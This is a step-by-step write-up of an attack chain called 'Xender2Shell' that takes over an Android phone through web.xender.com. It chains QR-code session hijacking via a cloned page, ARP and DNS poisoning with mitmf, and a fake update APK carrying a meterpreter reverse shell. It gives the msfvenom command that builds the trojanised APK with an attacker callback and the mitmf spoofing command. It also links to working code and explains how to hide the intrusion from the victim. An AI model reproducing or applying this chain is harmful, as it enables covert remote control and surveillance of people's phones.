Here is a way to compromise a victim’s android phone using web.xender.com. I have chained multiple things to achieve this.

Taking over the victim xender session

Step 1 :

Using the code below, I start a browser session in my pc which is the attacker machine and load web.xender.com. Then I extract the qr code from it. I am using selenium with python to achieve this. I have used MQTT protocol to transmit the qrcode in realtime to the fake page I created by cloning the original web.xender.com.

Step 2:

The QR code that I’ve received from Step 1, is being inserted into the fake page that I’ve created with the help of some modifications to the original page’s source code, using Java Script.

Step 3:

Generate an malicious apk which looks like an xender update. To do that i simply created an app and then injected the msfpayload into it.

msfvenom -x xenmod.apk -p android/meterpreter/reverse_tcp LHOST=10.1.75.142 LPORT=4443 -o xen_update.apk

Here we make use of DNS poisoning* with the help of mitmf(Man in the Middle Time Framework)*.

Put the fake page into your apache and then do an mitmf with dns poisoning and also don’t forget to add a rule in the mitmf.conf

mitmf.conf

Launch a mitmf attack on the victim machine you are targeting or the whole network.

In my example i am targeting my virtual machine

sudo python mitmf.py -i eth1 --spoof --arp --dns --analyze --gateway 10.1.75.1 --target 10.1.75.178

Step 4:

Wait for the victim to visit web.xender.com and connect his phone.

Step 5:

Once he connects to web.xender.com (NOTE: the victim will be seeing the page I created).

He will scan the QR code. Now, his xender session will be connected to the browser that I have created in Step 1.

Step 6:

Upgrading the xender session to the meterpreter shell.

To achieve this I have added the few modification to the code. Since xender has an option to install app in the mobile. So we can remotely push the fake update to the user. And make him click the update.

In Order to install an application via xender we have to

Click the application’s button Click install app Upload the apk Request will be sent to the mobile.

To automate the above process I once again relied on the selenium with python.

Step 7:

Collect the cookies from the generated session, transmit them to the victim browser and add them to the memory. Once they’re added, the mitmf attack is stopped and reload request is sent to the victim’s browser via a javascript code.This will now reclaim the actual xender in the victim’s browser. So there won’t be any suspicions.

Xener2Shell working demo:

Working code:

https://github.com/sathish09/xender2shell

Note* if your are using kali linux install an normal firefox instead of esr.

Post Exploitation:

This can also be used to compromise the vitim mobile if I already have access to the victim’s computer.

If you have already compromised the victim’s computer, you can use a similar technique to take control of the victim’s mobile.